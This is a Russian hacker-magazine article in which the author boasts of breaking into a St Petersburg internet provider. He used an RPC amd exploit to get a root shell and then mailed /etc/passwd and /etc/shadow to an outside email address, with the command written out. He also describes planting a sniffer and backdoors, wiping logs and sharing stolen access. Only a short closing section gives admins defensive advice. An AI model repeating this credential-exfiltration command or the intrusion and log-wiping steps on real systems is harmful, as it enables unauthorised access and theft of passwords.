Взлом питерского ISP
Xakep Online -> Журнал, номер #012, стр. 012-036-1
Hell-Man
Привет. Читая этот журнал, ты, наверное, хочешь стать кул хацкером. Есть два способа этого достичь: ты читаешь много умных книжек и через пару-тройку лет сможешь сам искать баги в софте и писать эксплоиты, а второй способ - ты тупо юзаешь уже написанные эксплоиты. Так вот, юзать-то ты их можешь, да на чем? Я тебе расскажу историю, как был взломан один из питерских провайдеров.
Подготовка к взлому
Все это начиналось поздно вечером... когда нечего было пить, есть и все такое. Захотелось что-нибудь сделать. Создав парочку файлов с IP-адресами провайдеров, я запустил свой любимый сканнер, который после долгих размышлений мне ответил, что на сайте www.*****.ru есть демон AMD. Если ты не знаешь, что это собой представляет, то читай FAQ по RPC демонам Юникса. Так вот, я очень обрадовался, думал, что "ща я все тама захакаю и все такое", но не тут-то было :). Попробовал я откомпилить эксплоит для AMD, а он ругается... не компилится. Около часа я переписывал его под свой линух. После долгих мучений он все-таки скомпилился и вроде заработал. Настал ответственный момент, так как попытка у меня одна, и если ничего не получится, то второго раза не дано (демон падал после первой попытки). О,кей, пускаю "hellman@localhost$./adm www.*****.ru". Через несколько секунд у меня был рутовый шелл на сервак этого провайдера. Что делать дальше?
ВЗЛОМ и РАБОТА С СЕРВАКОМ
Сначала я послал себе файл паролей на мыло командой "cat /etc/passwd | mail comphell@hotmail.com ; cat /etc/shadow | mail comphell@hotmail.com". Посмотрев файл паролей, я понял, что что-нибудь расшифровать получится, так как юзеров было много :). Но мне хватило одного. Ломанулся я на сервак по телнету, облом, не пускают. Но я это быстро исправил, изменив файл /etc/hosts.deny. Как только я вошел туда, то сразу закачал туда сниффер и пару своих собственных бэкдоров. Зайдя под рутовым шеллом, я запустил все эти снифферы и бэкдоры, потом убил логи и исправил обратно все системные файлы. Теперь в любое время я имел доступ к их системе с правами рута :). Теперь многие мои питерские друзья пользуются халявным Инетом... Круто? А ведь ничего особенного! Это простой, обычный и, я бы даже сказал, один из примитивнейших взломов. И он вполне реален! Почему? Потому что сисадмин того сервера не только лентяй, но еще и дурак, не читающий ни одной рассылки о багах и новых дырках (и о старых, кстати, тоже :)).
Защита от таких взломов
Хех... Дорогие господа "Ожиревшие от лени админы", эту часть статьи я обращаю к вам! Что бы такого ни произошло с вашим сервером, то, пожалуйста, следуйте следующим советам:
1. Всегда читайте последние новости о дырках в программном обеспечении, чтобы вовремя его пофиксить.
2. Никогда не открывайте протоколы, через которые можно удаленно запускать ПО на вашем сервере на стандартных портах (telnet, rsh, rlogin and etc).
3. Смотрите на дату и время изменения системных файлов, так как хакер может подменить их своими файлами с троянскими конями.
4. Не давайте пользователям делать легкие пароли, так как их легко расшифровать.
